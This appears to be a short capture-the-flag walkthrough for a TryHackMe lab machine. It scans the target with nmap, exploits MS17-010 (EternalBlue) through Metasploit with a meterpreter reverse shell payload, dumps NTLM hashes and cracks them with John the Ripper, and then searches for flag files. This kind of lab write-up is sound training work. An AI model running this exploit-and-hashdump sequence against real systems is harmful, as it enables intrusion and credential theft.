Last updated 7 months ago
Room Link: https://tryhackme.com/room/blue
nmap -A 10.10.68.22
The box is vulnerable to ms17-010
nmap -p135,139,445,3389 --script=vuln 10.10.68.22
msfconsole search eternalblue use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set RHOSTS 10.10.68.22 run
hashdump
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Just ran this to find the locations of all the flags then grabbed them
cd C:\ dir "flag*" /s
